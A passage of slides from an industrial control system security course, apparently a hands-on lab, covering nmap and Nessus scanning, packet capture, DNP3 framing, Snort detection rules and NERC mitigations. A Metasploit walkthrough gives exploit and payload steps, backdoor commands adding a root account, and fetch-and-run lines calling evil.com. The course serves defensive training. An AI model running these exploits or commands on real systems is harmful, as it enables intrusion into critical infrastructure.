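        if not (0 <= lo_i <= hi_i <= 255):
            raise ValueError(f"bad octet range: {piece!r}")
        values.extend(range(lo_i, hi_i + 1))
    return values


def expand_targets(spec: str) -> Iterator[str]:
    """Yield every IPv4 address covered by one Nmap target specification."""
    if "/" in spec:
        # CIDR form; strict=False lets 192.168.2.1/24 mean the enclosing /24.
        net = ipaddress.ip_network(spec, strict=False)
        # Like Nmap, a CIDR spec includes the network and broadcast addresses,
        # which is why 192.168.2.0/24 yields 256 targets, not 254.
        for addr in net:
            yield str(addr)
        return
    parts = spec.split(".")
    if len(parts) != 4:
        raise ValueError(f"not an IPv4 target spec: {spec!r}")
    # Cartesian product of the per-octet value lists, in Nmap's natural order.
    for octets in itertools.product(*(_octet_values(p) for p in parts)):
        yield ".".join(map(str, octets))


def count_targets(spec: str) -> int:
    """Number of hosts a spec would make Nmap touch."""
    return sum(1 for _ in expand_targets(spec))


if __name__ == "__main__":
    for spec in ("192.168.2.1-254", "192.168.2.0/24", "192.168.1-4.1-254", "192.168.0.0/16"):
        print(f"{spec:20s} {count_targets(spec):6d} targets")
```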
Nmap Network Exploration
[Screenshot: Nmap output showing discovery of ports and services]
Nmap Network Exploration
There is a GUI for Nmap so that you don't need to memorize all of the options, but we will be using the command line in this class.
The options in the menus correspond to the option flags used in the command line version.
Exercises
Run the following nmap commands in a Linux shell (don't forget the -oN <file> option, and replace the X with your subnet):
nmap -sP -n 192.168.X.1-100  (Ping Scan)
nmap -sS -n 192.168.X.1-100  (Syn Scan)
nmap -sS -n -O -p- 192.168.X.1-100  (Syn Scan w/ OS detection on all ports)
nmap -sV -n 192.168.X.1-100  (TCP Connect Scan w/ version Detection)
nmap -A -n 192.168.X.1-100  (Everything Scan)
How did the results differ between these scans?
What different types of information are available?
Review
Nmap is a network discovery tool and can be used for
identifying the systems currently connected to your
network. It will also allow you to audit what services are
running on the identified hosts.
What was discovered?
Did you see any new devices or computers?
Did you see your neighbors and their systems?
What services were observed?
What NERC requirements might Nmap be useful for?
Nessus Security Scanner
The Nessus Security Scanner is a security auditing tool made up of two parts: a server and a client.
The server, nessusd, is in charge of the attacks.
The client, nessus, provides an interface to the user.
Nessus is the standard for (free) open source network vulnerability scanners.
This tool can be DANGEROUS to your system, use with caution!
The Nessus Client Screen
Target Selection
192.168.2.88
These targets should be what was discovered with nmap. Use known network addresses: 192.168.2.88, plus a couple of others that you discovered with nmap.
Scan Options
Plug-in Options (for efficiency)
Backdoors
CISCO
Database
FTP
Gain a shell remotely
Gain root remotely
General
Misc
RPC
Remote file access
Settings
Web Server
Windows
Windows: MS Bulletins
Windows: User mgmt.
Port Scanner: Ping
Nessus SCADA Plugins (not on CD)
Areva/Alstom Energy Management System
DNP3: Binary Inputs Access; Link Layer Addressing; Unsolicited Messaging
ICCP: ICCP/COTP Protocol; ICCP/COTP TSAP Addressing
LiveData ICCP Server
Matrikon OPC Explorer
Matrikon OPC Server for ControlLogix
Matrikon OPC Server for Modbus
Modbus/TCP: Coil Access; Discrete Input Access; Programming Function Code Access; Modbus Slave Mode
Modicon: Modicon PLC CPU Type; PLC Default FTP Password; PLC Embedded HTTP Server; PLC HTTP Server Default Username/Password; PLC Telnet Server; IO Scan Status; Modicon PLC Web Password Status
National Instruments Lookout
OPC DA Server / OPC Detection / OPC HDA Server
Siemens S7-SCL
Siemens SIMATIC PDM
Siemens Telegyr ICCP Gateway
Sisco OSI/ICCP Stack
Sisco OSI Stack Malformed Packet Vulnerability
Tamarack IEC 61850 Server
Exercise Start Nessus
You must start the Nessus Client and Server from the K-Menu
Exercise Nessus Client Logon
Nessus servers:
Localhost - User/pass: knoppix
Remote - User/pass: nessus
Corp 192.168.2.64
DMZ 192.168.10.64
Control 192.168.1.64
Exercise Scan and Save Report(s)
1. Set scan options and select desired plugins
2. Set target range (Nmap style)
3. Start the scan
Once a scan has completed, view the results in this window
Review
Nessus is a network vulnerability scanner that can identify
currently connected hosts on your network and any
vulnerable services / applications that are running.
What information does Nessus provide that you didn't find with Nmap?
What different types of security problems did you discover?
Did you find any false positives?
How did you determine if a finding was a false positive?
What NERC requirements might Nessus be useful for?
Analyze Communications: tcpdump
Tcpdump prints out the headers of packets on a
network interface that match the Boolean expression.
It can also be run with the -w flag, which causes it to
save the packet data to a file for later analysis, and/or
with the -r flag, which causes it to read from a saved
packet file rather than to read packets from a
network interface.
In all cases, only packets that match the expression will
be processed by tcpdump.
www.tcpdump.org
A Very Efficient & Clean Way for Creating a
Customized Wire Tap on Your Network.
TCPDump
Some common options for tcpdump:
-s <len>   The snap length of the packet capture (0 = capture whole packets)
-C <size>  Limit output file to size (in MB)
-F <file>  Input filter file
-i <lan>   Network interface to sniff
-w <file>  Output PCAP file
tcpdump -s 0 -i eth0 -w filename.pcap
Analyze Communications: Wireshark
Wireshark (formerly Ethereal) is a GUI network protocol analyzer. It lets you interactively browse packet data from a live network or from a previously saved capture file. Wireshark's native capture file format is libpcap format, which is also the format used by tcpdump & various other tools.
Wireshark is THE Standard for Performing Network Protocol Analysis.
Wireshark
Security Note:
In practice, it is advised that traffic monitoring be done with tcpdump and the resulting .pcap file be used in Wireshark for analysis.
This is due to security issues with Wireshark, which leave your PC vulnerable if it is used on active networks. Rule of thumb:
Capture with tcpdump - Analyze with Wireshark
SCADA LAN Traffic
Distributed Network Protocol (DNP)
An open protocol for communications between
substation equipment and front-end devices
Heavy use of Cyclic Redundancy Checks (CRCs)
embedded in data packets
Historically used over serial communications, now being
used over TCP/IP
Designed for use in harsh environments
Designed for reliability
No confidentiality or integrity checks explicitly included
DNP3
Built on OSI layers 1, 2, & 7
Conversations typically occur between a DNP3 Master and DNP3 Outstations
Data payloads contain a pair of CRC octets for every 16 data octets
Usually found on TCP port 20000
Protocol stack (top to bottom):
DNP3 User's Code
DNP3 Application Layer
Pseudo Transport Layer
DNP3 Link Layer
TCP
IP
Ethernet
Encapsulation (each header is followed by its data):
Ethernet Header | Ethernet Data
IP Header | IP Data
TCP/UDP Header | TCP/UDP Data
DNP3 Header | TH | ASDU + CRCs
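The link-layer CRC scheme just described, as an added example (not code from the course CD or from any DNP3 stack): a 10-octet link header whose first 8 octets are covered by a 16-bit CRC, followed by user data in blocks of up to 16 octets, each with its own 2-octet CRC. The sample request, the control octet 0xC4 and the function names build_frame and parse_frame are constructed here; the CRCs catch line errors only and can be recomputed by anyone who rewrites a frame, which is why the slide counts DNP3 as having no integrity protection.

```python
"""DNP3 link-layer frame check (added example; not from the course CD).
The CRC is DNP3's own CRC-16 (polynomial 0x3D65, bit-reflected, result
inverted), transmitted least-significant octet first."""
import struct
from typing import Tuple

_POLY_REFLECTED = 0xA6BC  # 0x3D65 with its 16 bits reversed
_TABLE = []
for _i in range(256):
    _c = _i
    for _ in range(8):
        _c = (_c >> 1) ^ _POLY_REFLECTED if _c & 1 else _c >> 1
    _TABLE.append(_c)


def dnp3_crc(data: bytes) -> int:
    """CRC-16/DNP. Check value: dnp3_crc(b'123456789') == 0xEA82."""
    crc = 0
    for b in data:
        crc = _TABLE[(crc ^ b) & 0xFF] ^ (crc >> 8)
    return (~crc) & 0xFFFF


def build_frame(ctrl: int, dest: int, src: int, user_data: bytes) -> bytes:
    """Assemble a link frame: 0x05 0x64, LEN, CTRL, DEST, SRC, CRC, then data blocks."""
    if len(user_data) > 250:
        raise ValueError("a DNP3 link frame carries at most 250 user octets")
    length = 5 + len(user_data)  # LEN counts CTRL+DEST+SRC plus user data, not CRCs
    header = struct.pack("<BBBBHH", 0x05, 0x64, length, ctrl, dest, src)
    frame = header + struct.pack("<H", dnp3_crc(header))
    for i in range(0, len(user_data), 16):
        block = user_data[i:i + 16]
        frame += block + struct.pack("<H", dnp3_crc(block))  # CRC per 16-octet block
    return frame


def parse_frame(frame: bytes) -> Tuple[int, int, int, bytes]:
    """Check every CRC and return (ctrl, dest, src, user_data); ValueError otherwise."""
    if len(frame) < 10 or frame[:2] != b"\x05\x64":
        raise ValueError("missing DNP3 start octets or truncated header")
    header, (hcrc,) = frame[:8], struct.unpack("<H", frame[8:10])
    if dnp3_crc(header) != hcrc:
        raise ValueError("header CRC mismatch")
    length, ctrl, dest, src = struct.unpack("<BBHH", header[2:8])
    remaining, pos, data = length - 5, 10, b""
    while remaining > 0:
        n = min(16, remaining)
        if len(frame) < pos + n + 2:
            raise ValueError("frame truncated inside a data block")
        block = frame[pos:pos + n]
        (bcrc,) = struct.unpack("<H", frame[pos + n:pos + n + 2])
        if dnp3_crc(block) != bcrc:
            raise ValueError(f"CRC mismatch in data block at offset {pos}")
        data += block
        pos += n + 2
        remaining -= n
    if pos != len(frame):
        raise ValueError("trailing octets after the last data block")
    return ctrl, dest, src, data


def frame_is_intact(frame: bytes) -> bool:
    """True when the frame is well formed and every CRC checks out."""
    try:
        parse_frame(frame)
        return True
    except ValueError:
        return False


def flip_bit(frame: bytes, offset: int) -> bytes:
    """Return a copy of the frame with the low bit at `offset` inverted (a line error)."""
    damaged = bytearray(frame)
    damaged[offset] ^= 0x01
    return bytes(damaged)


# Constructed sample: master (address 1) asks outstation 10 for class 1 events.
# Transport header 0xC0 (FIR|FIN, seq 0), then the application fragment:
# app control 0xC0, function 0x01 READ, object group 60 variation 2, qualifier 0x06.
SAMPLE_USER_DATA = bytes([0xC0, 0xC0, 0x01, 0x3C, 0x02, 0x06])
# CTRL 0xC4: DIR=1 (from master), PRM=1 (primary), FC=4 (unconfirmed user data).
SAMPLE_FRAME = build_frame(ctrl=0xC4, dest=10, src=1, user_data=SAMPLE_USER_DATA)

if __name__ == "__main__":
    print(SAMPLE_FRAME.hex())
    print(parse_frame(SAMPLE_FRAME))
    print("damaged frame intact?", frame_is_intact(flip_bit(SAMPLE_FRAME, 12)))
```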
Exercise Start Wireshark
Launch Wireshark from the K-Menu
Exercise Analyze Saved File
Use filter expressions to find traffic, e.g.:
tcp.port == 80
ftp
ip.addr == 192.168.1.10
Open the provided PCAP file for analysis
Exercise Analyze Live Traffic
Select the network interface
Capture traffic on your network for analysis
Review
Tcpdump and Wireshark are the de facto standards for network sniffing and analysis. These two tools provide the ability to tap and analyze Ethernet SCADA protocols.
What network traffic did you find?
What SCADA-specific protocols were found? What did you learn?
Did you find plain-text information?
What are the limitations of Wireshark?
What NERC requirements might Wireshark be useful for?
Network Compromise
Metasploit provides useful information to people who
perform penetration testing, IDS signature
development, and exploit research. This project was
created to provide information on exploit techniques
and to create a useful resource for exploit developers
and security professionals. The tools and information
on this site are provided for legal security research and
testing purposes only. Metasploit is a community
project managed by Metasploit LLC.
http://www.metasploit.com/
An open-source hacking toolkit
Metasploit Network Compromise
The Metasploit Framework
Msfconsole (interactive command-line control)
Msfcli (useful for scripting metasploit commands)
Msfpayload (shellcode and executable generation)
Msfgui (point-and-click hacking)
Msfweb (web-based GUI)
Refer to supplemental slides for additional instructions
Exercise - Start the Metasploit Console
1. Start a root shell
2. cd to the /INL/metasploit/framework-3.1 directory
3. Execute the metasploit console using the ./msfconsole command
Exercise - The Basic Exploit Process
1. show exploits
2. use exploit <full exploit name>
3. show options
4. set <opt name> <value>
5. show payloads
6. show options
7. set <opt name> <value>
8. set TARGET <value>
9. set PAYLOAD <full payload name>
10. exploit
Exercise - Interacting With Hosts
Standard reverse and bind shell payloads
Meterpreter payloads
Use the sessions command to interact with exploited hosts
Exercise - Interacting With Hosts
VNC payloads
VNC payloads provide desktop access to exploited hosts (very noisy)
Review
Metasploit is an open-source exploitation framework for
script-kiddies and network auditors.
What exploits worked?
Was it easy or hard?
Should we worry about Metasploit on our networks?
How can Metasploit be used in a defensive manner?
Can Metasploit be used to meet any NERC requirements?
Rotate to the Next Network
Corporate Network -> DMZ
DMZ -> Control Network
Control Network -> Corporate Network
Don't forget to re-run the pump command
Follow the Process You Just Learned
1. Network Discovery (nmap)
2. Vulnerability Analysis (nessus)
3. Network Traffic Analysis (tcpdump)
4. Network Exploitation (metasploit)
Defense,
Detection and Analysis
Application and Services Security
Discovery and Analysis
Be curious about software used on your systems
Investigate as a poorly informed user
Investigate as a bad guy (hacker)
Analyze what applications & services are available on
your critical networks
Check database user privileges & database service
configuration
Examine the communication protocols in use
DNS Traffic
Webserver traffic
Proprietary Traffic
Application and Services Security
Least Privileges
The principle of least privilege requires that a user be given no more privilege than necessary to perform a job. Ensuring least privilege requires identifying what the user's job is, determining the minimum set of privileges required to perform that job, & restricting the user to a domain with those privileges & nothing more. By denying to subjects transactions that are not necessary for the performance of their duties, those denied privileges cannot be used to circumvent the organizational security policy.[1]
[1] Integrity in Automated Information Systems. National Computer Security Center, September 1991.
Least privileges may not be possible due to technology limitations
User (in this example) may be a computer
Application and Services Security
Least Privileges
An important note with respect to least privileges:
This methodology does not remove vulnerabilities from a system. It only prevents exploitation from obtaining immediate superuser access.
Administrators still need to care for their systems to prevent escalation of privileges when unauthorized access is gained.
Basic Intrusion Detection
Snort is an open source network intrusion detection system (IDS) capable of performing real-time traffic analysis and packet logging on IP networks. It can perform protocol analysis, content searching & matching and can be used to detect a variety of attacks and probes, such as buffer overflows, stealth port scans, CGI attacks, SMB probes, OS fingerprinting attempts and more.
Snort uses a flexible rules language to describe traffic that it should collect or pass, as well as a detection engine that uses a modular plug-in architecture.
Snort has three primary uses. It can be used as a straight packet sniffer like tcpdump, a packet logger (useful for network traffic debugging and so on), or as a full-blown network intrusion detection system.
www.webopedia.com
Network Intrusion Detection Is a Great Way of Monitoring What Communication You KNOW Should Be ALLOWED on Your Network.
Basic Intrusion Detection
Expectations
What they can do for you
Forewarning
- Detect activities that are precursors to real attacks
- Allow for reaction before the real attack
Post-Attack Analysis
- Computer forensic investigation
- Intrusion post-mortem
Situational Awareness
- Develop knowledge of typical behavior
What they can't do
- Tell you if the system was exploited
- Tell you what happened on the system console
- Do analysis
Basic Intrusion Detection
IDS vs. IPS Placement
[Diagram: Network A - Firewall - IDS - Protected Network, beside Network A - Firewall - IPS - Protected Network]
Basic Intrusion Detection
Anomaly Detection
Teach detector what is normal network traffic
What if learning period includes attacks?
Detects deviations from normal behavior
User login behaviors
File accesses
More difficult to fake out
Needs no foreknowledge of attack signatures
May raise more false positives
WHAT is normal, anyway?
WHEN does normal become abnormal?
Basic Intrusion Detection
IDS Signatures
Policy Signatures
What should be happening on your network?
Policy signatures detect unexpected activity.
Security Signatures
Signatures that identify known vulnerabilities in your network.
Watch security notices and write signatures based on relevant
details like port numbers, specific content, and propagation
behaviors
Basic Intrusion Detection
Signature vs. Anomaly Detection
Signature                                 | Anomaly
Watches for specific events               | Watches for changes in trends
Only looks for what it's been told        | Learns from gradual changes
Can deal with any known threat            | Can deal with unknowns, but any attack is subject to false negative
Unaware of network configuration changes  | Sensitive to changes in network devices
Highly objective inspection               | Subjective, prone to misinterpretations
Predictable behavior                      | Unpredictable behavior
Easy to tune manually                     | Must trust the system completely
Basic Intrusion Detection
Sensor & Node Placement
Borders
All points of presence
DMZs
Either side of firewalls
- Outside provides intelligence gathering/forewarning
- Inside detects attacks
Internal Subnets
Between campuses
On networks with sensitive information
Basic Intrusion Detection
Sensor & Node Placement
[Network diagram: Substations (meters, breakers, switches, transformers, relays, RTU/PLC, vendor modem) connect over serial links to the SCADA LAN (front end processor, applications server, configuration server, database server, historian, HMI computers, engineering workstation, ICCP server, modem pool to vendors, ICCP peers). A SCADA firewall separates the SCADA LAN from the DMZ LAN (historian, corporate PBX, WWW server, communications servers), and a corporate firewall separates the DMZ from the Corporate LAN (business servers, web applications, workstations, DNS server) and the Internet. IDS/IPS sensors sit at the SCADA firewall and at the corporate firewall.]
Host Intrusion & Application Log Detection Systems
Network Intrusion Detection & Prevention Systems
Virus, Spyware, & Bot Detection Systems
Basic Intrusion Detection
Example Snort Configuration
[Screenshot: example Snort configuration]
We need new rules for the control LAN
Basic Intrusion Detection
Legal Traffic Laws
SIGNATURE ID: 1000001
Message: Unauthorized communications with HMI
Rule:
alert tcp 192.168.0.97 any <> ![192.168.0.3,192.168.10.21] any (msg:"HMI talking to someone other than PLC or RTU - NOT ALLOWED"; priority:1; sid:1000000; rev:1;)
Summary: An unauthorized system attempts to connect to the HMI
Impact: Compromise of Control
Information: The HMI has a limited number of hosts with which it should communicate. Most SCADA/DCS networks have a limited number of HMI or other control devices that should exchange information to/from one another. An adversary may attempt to compromise an HMI to negatively affect the process being controlled.
Affected Systems: PLC; RTU; HMI; DMZ-Web
Basic Intrusion Detection
A Network Canary
SIGNATURE ID: 1000002
Message: Unauthorized IDS communications
Rule:
alert tcp 192.168.0.41 any <> any any (msg:"IDS talking to someone - NOT ALLOWED"; priority:1; sid:1000002; rev:1;)
Summary: A system attempts to connect to the IDS sensor
Impact: Compromise of Monitoring; Unauthorized network activity
Information: No device on the control network should communicate with the IDS sensor. This rule is used as a canary for monitoring for unauthorized traffic on the control network.
Affected Systems: All
Basic Intrusion Detection
Monitor Special Services
SIGNATURE ID: 1000003
Message: Unauthorized to RTU Telnet/FTP
Rule:
alert tcp !$PCS_HOSTS any -> 192.168.0.3 23 (msg:"Unauthorized connection attempt to RTU Telnet"; flow:from_client,established; content:"GET"; offset:2; depth:3; reference:DHSINLroadshow-IDStoHMI1; classtype:misc-activity; sid:1000003; rev:1; priority:1;)
Summary: A control LAN resource attempts to connect to the RTU Telnet server
Impact: Compromise of Control; Reconnaissance
Information: No device other than an EWS will need to communicate with an embedded RTU Telnet server. Most SCADA/DCS networks have a limited number of EWS or other control devices that should exchange information to/from an RTU. An adversary may attempt to compromise an RTU to negatively affect the process being controlled.
Affected Systems: RTU
Basic Intrusion Detection
Audit Network Config Changes
SIGNATURE ID: 1000004
Message: Unauthorized to firewall configuration ports
Rule:
alert tcp any any <> 192.168.0.254 443 (msg:"Somebody looking at firewall-443"; sid:1000007; rev:1;)
alert tcp any any <> 192.168.0.254 80 (msg:"Somebody looking at firewall-80"; sid:1000008; rev:1;)
Summary: A system attempts to connect to the firewall using one of the configuration ports
Impact: Compromise of network resource; Reconnaissance
Information: Only authorized hosts are allowed to connect to the firewall from the control system network.
Affected Systems: Firewall
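To show what these four policy-style rules actually fire on, the following added example (not part of the course material and not Snort) interprets just their headers, including negation (!), address lists ([a,b]), the $PCS_HOSTS variable and the bidirectional operator (<>), and runs them over a constructed set of control-LAN connection records. The $PCS_HOSTS value, the connection records and the function name evaluate are assumptions made here.

```python
"""Rule-header matcher for the policy signatures above (added example, not Snort).
Options are not interpreted beyond msg and sid; port ranges (1:1024) and CIDR
address specs, which Snort supports, are out of scope for this illustration."""
import re
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

Connection = Tuple[str, int, str, int]  # (src_ip, src_port, dst_ip, dst_port); TCP assumed

# The rule headers from the cards above, with options trimmed to msg and sid.
RULES = [
    'alert tcp 192.168.0.97 any <> ![192.168.0.3,192.168.10.21] any '
    '(msg:"HMI talking to someone other than PLC or RTU - NOT ALLOWED"; sid:1000000; rev:1;)',
    'alert tcp 192.168.0.41 any <> any any (msg:"IDS talking to someone - NOT ALLOWED"; sid:1000002; rev:1;)',
    'alert tcp !$PCS_HOSTS any -> 192.168.0.3 23 '
    '(msg:"Unauthorized connection attempt to RTU Telnet"; sid:1000003; rev:1;)',
    'alert tcp any any <> 192.168.0.254 443 (msg:"Somebody looking at firewall-443"; sid:1000007; rev:1;)',
]
# Assumed value for $PCS_HOSTS: the one engineering workstation allowed to reach the RTU.
VARIABLES = {"PCS_HOSTS": "[192.168.0.50]"}


@dataclass
class Spec:
    """One address or port field of a rule header; an empty set means 'any'."""
    values: Set[str]
    negated: bool = False

    def matches(self, value: str) -> bool:
        if not self.values:
            return True
        return (value in self.values) != self.negated


@dataclass
class Rule:
    sid: int
    msg: str
    src: Spec
    sport: Spec
    direction: str  # '->' or '<>'
    dst: Spec
    dport: Spec

    def matches(self, conn: Connection) -> bool:
        src_ip, sport, dst_ip, dport = conn
        forward = (self.src.matches(src_ip) and self.sport.matches(str(sport))
                   and self.dst.matches(dst_ip) and self.dport.matches(str(dport)))
        if forward or self.direction == "->":
            return forward
        # '<>' also matches the connection seen from the other end.
        return (self.src.matches(dst_ip) and self.sport.matches(str(dport))
                and self.dst.matches(src_ip) and self.dport.matches(str(sport)))


HEADER = re.compile(r"^alert\s+tcp\s+(\S+)\s+(\S+)\s+(->|<>)\s+(\S+)\s+(\S+)\s*\((.*)\)\s*$")


def parse_spec(token: str, variables: Dict[str, str]) -> Spec:
    negated = token.startswith("!")
    token = token.lstrip("!")
    if token.startswith("$"):
        token = variables[token[1:]]  # e.g. $PCS_HOSTS -> [192.168.0.50]
    if token == "any":
        return Spec(set())
    return Spec(set(token.strip("[]").split(",")), negated)


def parse_rule(text: str, variables: Dict[str, str]) -> Rule:
    m = HEADER.match(text)
    if not m:
        raise ValueError(f"unsupported rule header: {text}")
    src, sport, direction, dst, dport, options = m.groups()
    sid = int(re.search(r"sid:\s*(\d+)", options).group(1))
    msg = re.search(r'msg:\s*"([^"]*)"', options).group(1)
    return Rule(sid, msg, parse_spec(src, variables), parse_spec(sport, variables),
                direction, parse_spec(dst, variables), parse_spec(dport, variables))


def evaluate(rule_texts: List[str], variables: Dict[str, str],
             connections: List[Connection]) -> List[Tuple[int, str, Connection]]:
    """Return (sid, msg, connection) for every rule that fires on every record."""
    rules = [parse_rule(t, variables) for t in rule_texts]
    return [(r.sid, r.msg, c) for c in connections for r in rules if r.matches(c)]


# Constructed connection records from a control LAN (not captured traffic).
SAMPLE_CONNECTIONS: List[Connection] = [
    ("192.168.0.97", 1034, "192.168.0.3", 502),     # HMI -> PLC, expected, no alert
    ("192.168.0.97", 1035, "192.168.0.77", 445),    # HMI -> unknown host: sid 1000000
    ("192.168.0.88", 3200, "192.168.0.41", 22),     # anything -> IDS sensor: canary 1000002
    ("192.168.0.50", 4000, "192.168.0.3", 23),      # EWS -> RTU telnet, allowed by $PCS_HOSTS
    ("192.168.0.88", 4001, "192.168.0.3", 23),      # other host -> RTU telnet: sid 1000003
    ("192.168.0.254", 443, "192.168.0.88", 5000),   # firewall -> host, caught via '<>': sid 1000007
]

if __name__ == "__main__":
    for sid, msg, conn in evaluate(RULES, VARIABLES, SAMPLE_CONNECTIONS):
        print(sid, msg, conn)
```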
Basic Intrusion Detection
Custom Rules in Action
Network Architecture
Common Firewall Problems
Huge rule set and complex rules
Rules not commented
Generic or simplified rules
Old/temporary rules not removed
Rules exist, but nobody knows why
Logging not enabled
In some cases, firewall is subverted by direct connection
Same firewall rules used on corporate and internal network
Network Architecture
Outbound Firewall Rules
A Good Question that Needs to Be Addressed is:
Should the implicit outbound rule on the firewall be allowed
on the SCADA network?
Should Hosts Be Able to Access Networks Other
than Their Own?
Do the SCADA Hosts Need Default Gateways?
Outbound Exceptions Should Be Created Just Like
Inbound Exceptions
Network Architecture
Network Segmentation
Similar to the IT environment
What users have access to the financial systems?
What hosts should have access to core SCADA servers?
Segmentation should be performed by a firewall or a
router with ACLs
Network Architecture
Auditing & Analysis
Argus - Generates network flow information from PCAP files
Afterglow - Creates pretty network maps from flow data
RAT (Router Audit Tool) - Audits router configuration files
Argus - http://www.qosient.com
RAT - http://www.cisecurity.org
Afterglow - http://afterglow.sourceforge.net
Logging and Log Analysis
Operating Systems and Applications provide a wealth
of logging information. This information can be used
to monitor the health of the system and potentially
detect malicious activity.
Log Correlation Can Help Locate Problems
Logging and Log Analysis
Log Sources
Typical IT logs
Firewall, IDS, Antivirus, Syslog (*nix), Windows Event Log
Application Logs
SCADA, HTTP, database
Combine and Correlate Information
Network usage, CPU loads, access, debug, anomaly detection
Logging and Log Analysis
Available Tools
GFI tools (www.gfi.com)
Syslog (www.syslog.org)
BASE (base.secureideas.net)
Kiwi (www.kiwisyslog.com)
Swatch (swatch.sourceforge.net)
Log Correlation is an Art
Modern Hardware and Software Defenses
New Features
Hardware
No eXecute (NX, DEP, XD) bit - introduced with the AMD64 processor and then followed by the Pentium 4 (Prescott)
Software (Operating Systems)
Stack randomization
Library randomization
Heap Corruption Detection
Heap Randomization
Host Firewall
Software (Compilers)
/GS Stack Overrun Detection
/SafeSEH Exception Handler Protection
ASLR Address Space Layout Randomization
DEP/NX/XD NX Compliance
http://msdn.microsoft.com/en-us/library/bb430720.aspx
Review
Defense is difficult
Analyze the applications and services on your network
Perform some basic intrusion detection
Review and modify your network architecture
Although painful, someone has to review all of the logs
If possible, upgrade to modern hardware and software
Open Discussion
The End
Supplemental Slides
Metasploit Walkthrough
Conventions
red text is something you should type into msfconsole
<blue text in angle brackets> is an argument you need to
fill in
User interface options
msfconsole
most mature
for command-line ninjas, this is the most comfortable
msfweb
slower
slightly more intuitive to a novice
msfgui
still in beta
will probably change drastically in the next release
msfconsole
use exploit/windows/smb/ms06_040_netapi
this exploit works on all Windows hosts before XP SP2, 2000 SP4
the tab key is your friend
msfconsole
show options
set RHOST <target IP address>
e.g.: set RHOST 192.168.0.97
msfconsole
show payloads
only shows payloads for the target architecture
set PAYLOAD <your payload>
e.g.: set PAYLOAD windows/shell_bind_tcp
again, tab is your friend
Payload types
shell
for Windows this means cmd.exe; for Unix, /bin/sh
Pros: Simple; Reliable
Cons: Often triggers IDS; Requires much knowledge
Payload types
exec
execute a single shell command
e.g.: echo toor::0:0::/root:/bin/sh >> /etc/passwd
e.g.: net user hacker /add
Pros: Simple
Cons: Sometimes too simple; Requires much knowledge
Payload types
upexec
retrieves an executable from the attacker and runs it
similar to nc evil.com 4444 >foo.exe; foo.exe
Pros: Good way to run a rootkit
Cons: Requires outside executable
Payload types
download exec
downloads an executable and runs it
equivalent to wget evil.com/foo.exe; foo.exe
Pros: Good way to run a rootkit
Cons: Requires outside executable and a webserver to host it
Payload types
vncinject
starts a vnc server on the target and connects to it
Cadillac of Windows payloads
Pros: Pretty; Makes people say "Oooh"; Outstanding when HMI is the target
Cons: Slow, sometimes painfully; Noisy (lots of traffic)
Payload types
meterpreter
If vncinject is the Cadillac of Windows payloads, this is the Porsche
Pros: Powerful; Versatile; Entirely in memory
Cons: Requires commandline interface
Payload Delivery Methods
reverse_tcp
attempts to connect back to you
Pros: Can be used when target is behind a firewall
Cons: Network Address Translation (NAT) breaks it
Payload Delivery Methods
bind_tcp
the target listens for you to connect
Pros: Smaller; Can be used when you are behind NAT
Cons: Firewalls often get in the way
other useful msfconsole commands
show exploits
gives a long list of the exploits that metasploit knows about (more
than 250)
search smb
much shorter list, modules with smb in their name or description
case insensitive regular expression
Back to msfconsole
set PAYLOAD payload/windows/meterpreter/reverse_tcp
tab is still your friend
show options
should now have LHOST and LPORT
set LHOST <your IP address>
the default LPORT of 4444 is fine
The moment we've all been waiting for
exploit
triggers the vulnerability and sends the payload
if all went well, you just 0wned the target
sessions -i 1
msfweb
msfweb -- exploits
msfweb
select a target
the first one in the list is usually the most reliable or most common
msfweb
msfweb
select a payload
refer to the discussion above about payloads
msfweb
msfweb
set options to your liking
click Launch Exploit button
msfweb launch exploit
msfweb
bask in the glow of a command shell
VNC
If, as in the previous example, a VNC window is not
logged in, you can type explorer.exe into your cmd shell
to get a full desktop
other useful msfconsole commands
help
sessions
NERC
Mitigation Strategies
NERC Top 10 Vulnerabilities - 2007
1. Inadequate Policies, Procedures, and Culture Governing Control System Security
2. Inadequately designed control system networks that lack sufficient defense-in-depth mechanisms
3. Remote access to the control system without appropriate access control
4. System administration mechanisms and software used in control systems are not adequately scrutinized or maintained.
5. Use of inadequately secured wireless communication for control
6. Use of a non-dedicated communications channel for command and control and/or inappropriate use of control system network bandwidth for non-control purposes
7. Insufficient application of tools to detect and report on anomalous or inappropriate activity
8. Unauthorized or inappropriate applications or devices on control system networks
9. Control systems command and control data not authenticated
10. Inadequately managed, designed, or implemented critical support infrastructure
Vulnerability 1 Mitigations
Inadequate Policies, Procedures, and Culture Governing Control
System Security
Foundational
Assign a senior manager with overall responsibility for
leading and managing the entity's implementation of, and
adherence to, robust control system security practices
Document and implement a cyber security policy that
represents management's commitment and ability to secure its
critical infrastructure assets. Periodically review and update.
Develop security procedures and implementation
guidance to enable employees to implement specific
elements of the cyber security policy.
Develop a risk management plan that identifies and
documents a risk-based assessment methodology to identify its
critical assets. Periodically review and update as necessary
(particularly when operational changes result in new critical
assets).
Vulnerability 1 Mitigations
Inadequate Policies, Procedures, and Culture Governing Control
System Security - continued
Intermediate
Ensure policies and procedures comprehensively include
other parts of the enterprise, vendors, or contractors as
appropriate.
Form a teaming arrangement between information
technology and control system operations staff to facilitate
effective knowledge sharing.
Provide briefings to executive management detailing
control system risk posture.
Share industry best practices in security-policy structure
and topics
Advanced
Develop and implement a process for continuous
improvement and enforcement of policies and procedures
governing control system security.
Vulnerability 1 Mitigations
Inadequate Policies, Procedures, and Culture Governing Control
System Security - continued
Advanced continued
Provide periodic hands-on cyber security training for
control system personnel taught by applicable vendor or
consulting firm.
Perform periodic security-awareness drills and audits.
Include security-related roles, responsibilities, authorities,
and accountabilities in staff annual review and appraisal
processes.
Coherent and meaningful policies are understood and
internalized by all employees so that they are continually
working to achieve these goals as part of their daily task
activities.
Vulnerability 2 Mitigations
Inadequately designed control system networks that lack
sufficient defense-in-depth mechanisms
Foundational
Develop and periodically update a list of critical assets
determined through an annual application of a risk-based
assessment methodology.
Implement electronic perimeters. Disconnect all
unnecessary network connections following the NERC
security guideline Control System - Business Network
Electronic Connectivity Guideline.
Implement strong procedural or technical controls at the
access points to the electronic security perimeter to ensure
authenticity of the accessing party, where feasible (e.g.
restrict remote access to field devices).
Include detailed security requirements in all design
specifications.
Vulnerability 2 Mitigations
Inadequately designed control system networks that lack
sufficient defense-in-depth mechanisms continued
Intermediate
Implement compartmentalization design concepts to
establish electronic security perimeters and cyber asset
separation necessary for a defense-in-depth architecture.
Use special purpose networks with minimal shared
resources to transfer data between control system and non-control system networks.
Replace devices as necessary to attain desired security
functionality, or implement compensating security measures if
